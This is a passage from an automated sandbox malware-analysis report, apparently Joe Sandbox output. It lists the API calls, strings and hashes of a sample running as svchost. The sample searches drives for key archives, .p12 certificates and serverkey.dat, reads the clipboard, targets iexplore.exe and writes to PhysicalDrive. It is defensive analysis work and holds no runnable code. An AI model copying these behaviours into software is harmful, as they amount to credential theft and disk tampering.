                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID: bad pack level
                                                                                                                                                                                                              • API String ID: 2221118986-4081416248
                                                                                                                                                                                                              • Opcode ID: 48ea54d8184fc416c8d8669561325ee41c24a41370df15cd55b0c6372015aa81
                                                                                                                                                                                                              • Instruction ID: a2cae9453f32710c00ded83f4d690dd04cb524006e4529fc59a1cd1d68c49425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48ea54d8184fc416c8d8669561325ee41c24a41370df15cd55b0c6372015aa81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C631A2F5A007108AC321AFB9E8845ABF7E6FF46314B00493EE1AA96250D778B081CF53
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,0266757C), ref: 026677BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                              • String ID: more < 2
                                                                                                                                                                                                              • API String ID: 3510742995-2484782096
                                                                                                                                                                                                              • Opcode ID: 01f4fa1902ab8181eb6e0e0f9ac9eb696ddfc2ca1dab74b2303f65eeab84f3a5
                                                                                                                                                                                                              • Instruction ID: 7320c1e6ed271df854ea4bb42bd87e1f6ab40e578243d492a4cfc66b504852d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01f4fa1902ab8181eb6e0e0f9ac9eb696ddfc2ca1dab74b2303f65eeab84f3a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C33130B1610A008BD7259BB4C4487B7B3A6FF45328F144A3DD06B922D4E7786846CF43
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,00000068,?,0266910E,00000068,00000000,00000000,00000000,00000011), ref: 02668EF6
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,0266910E,00000068,00000000,00000000,00000000,00000011), ref: 02668F2C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileReadmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1163090680-0
                                                                                                                                                                                                              • Opcode ID: bba7e734f26445d34a0d998cb8b2ea7a35965f7e5390324a39ac11b80baff7ce
                                                                                                                                                                                                              • Instruction ID: f30b4d6acab42b1160061a19f1da8c3583245b15bdb5bf6f2fbd8aca9dd43ccf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bba7e734f26445d34a0d998cb8b2ea7a35965f7e5390324a39ac11b80baff7ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB1154B27007045FD720CA6ADC84A6BB7EAEFD4254B14892DE646C7B00D731E8048B64
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1a4f78453f45bad8d9103c3386f88e52845fd51b89d1a927d807f652db689c27
                                                                                                                                                                                                              • Instruction ID: da5b861d29410c5d8f96b31268623ad865170637e79d796c4f726b8f8194377f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a4f78453f45bad8d9103c3386f88e52845fd51b89d1a927d807f652db689c27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF01CB8111300AEEB58CF31D65DF6A77D1AB853A9F8AD0C9D0044F6A2CB78C449DF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,0265E2D2), ref: 026472F4
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$ConvertCreateFileFreeInfoLocalNamedSaclString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2757955739-0
                                                                                                                                                                                                              • Opcode ID: be48e32782f2c8b65a992b8fb8eea589b12bcaaed0afbce947d2ea2cb8a389a7
                                                                                                                                                                                                              • Instruction ID: 73053a7063919e76b69457ce42624b572848d9ea7460e67eec187f566b90254d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be48e32782f2c8b65a992b8fb8eea589b12bcaaed0afbce947d2ea2cb8a389a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4D012357C022031F23321283D9FFAA54544746F74F624754FBA1BE1C0DAC0184205D9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0264D35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0264D36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0264D392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 0264D3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 0264D3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264D3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264D3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0264D418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264D428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0264D437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0264D44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0264D459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 0264D46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 0264D47F
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264D4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264D4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 0264D4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0264D533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 0264D55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0264D569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 0264D585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 0264D5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 0264D5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264D5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0264D5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 0264D5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 0264D5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 0264D613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 0264D620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0264D630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 0264D64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 0264D655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0264D661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 0264D67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264D6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264D6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264D6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 0264D707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 0264D714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264D723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D73B
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0264D2BC
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: GetCurrentThreadId.KERNEL32 ref: 0264D2C4
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0264D2D0
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 0264D2E1
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0264D2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0264D748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0264D7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 0264D7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264D7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 0264D7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 0264D80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0264D818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0264D827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0264D82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0264D843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$static
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662BCE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02662C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02662C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02662C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662C81
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02662C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02662CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02662D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277,00000000,00000000), ref: 02662D77
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265D13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265D161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0265D176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0265D18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0265D1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0265D1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0265D24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0265D563
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$8A99A689$asus$found.$keys$path
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F570), ref: 026411AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 026411C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 026411DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 026411FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0264123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02641245
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B4B0,00000000,00000000,00000000), ref: 02641285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 026412A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 026412D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026412F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026412F9
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265EB30,00000000,00000000,00000000), ref: 02641339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026601A0,00000000,00000000,00000000), ref: 02641376
                                                                                                                                                                                                                • Part of subcall function 0265B410: PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B437
                                                                                                                                                                                                                • Part of subcall function 0265B410: PathFileExistsA.SHLWAPI(?), ref: 0265B4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264139F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0265327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02653286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 0265329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 026532AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 026532D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 026532FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02653301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0265332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02653399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 026533DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: 998f2e9a813646ea198bc65db741c7c1cfb25bfa1af1fa9daaf4046f188f6834
                                                                                                                                                                                                              • Instruction ID: 45cedd927b9c066075aa5a8fcdd70164609483bddfa7adcedaf700a2110a8ad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 998f2e9a813646ea198bc65db741c7c1cfb25bfa1af1fa9daaf4046f188f6834
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96513432604361ABD7219F249C9CF6F7BA8EFC6B94F010758FC8697380DF21D52486A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 0265190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02651915
                                                                                                                                                                                                              • memset.MSVCRT ref: 02651990
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02651999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,76F8F550,76F91620,80000002), ref: 026519E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026519E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026519F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026519F6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651A06
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02651A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02651A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02651A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02651A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              • API String ID: 2523706361-3242205626
                                                                                                                                                                                                              • Opcode ID: a7ad56b85bc9ee7abb9adab73fcbe32a759f5365f4e3b88610e160150738bd6a
                                                                                                                                                                                                              • Instruction ID: da55af54ede3da3e44a0c5aa198045587fefedee73cdbdfd41c0ef41047c2fbc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7ad56b85bc9ee7abb9adab73fcbe32a759f5365f4e3b88610e160150738bd6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58310731E8137167E72236705C49F6F3A889F02B15F5606A8FC4AA7341EBA4C8408AF6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              • Opcode ID: 7c7a5bdad75330203568f6000a3b48ce82f5a2d71da85286c73fcf95971b3af6
                                                                                                                                                                                                              • Instruction ID: 98a440d4b9a67dc1f9baad687ef8dbc10def3c3b99de1e74d5d413968879cd1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7a5bdad75330203568f6000a3b48ce82f5a2d71da85286c73fcf95971b3af6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF19FB1A00209ABDB20CF58D890BAEB7B5FF88714F644669FD45A7340DB71ED51CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0269DDB4,?,?,?), ref: 02653428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(0269DDB4,?,?,?), ref: 02653438
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653465
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02653487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,76F89300), ref: 026534B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 026534C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 026534D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 026534EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02653655), ref: 02653507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02653518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              • Opcode ID: fcae9f3c2aff0cfe2077f126b346eb15be1853f557f60f7ee63ca67ae8b98b67
                                                                                                                                                                                                              • Instruction ID: af3aca4ce4e0fdf07823e0e3d2ec66e61a3401f7dd2cb279d897c43da842a5e0
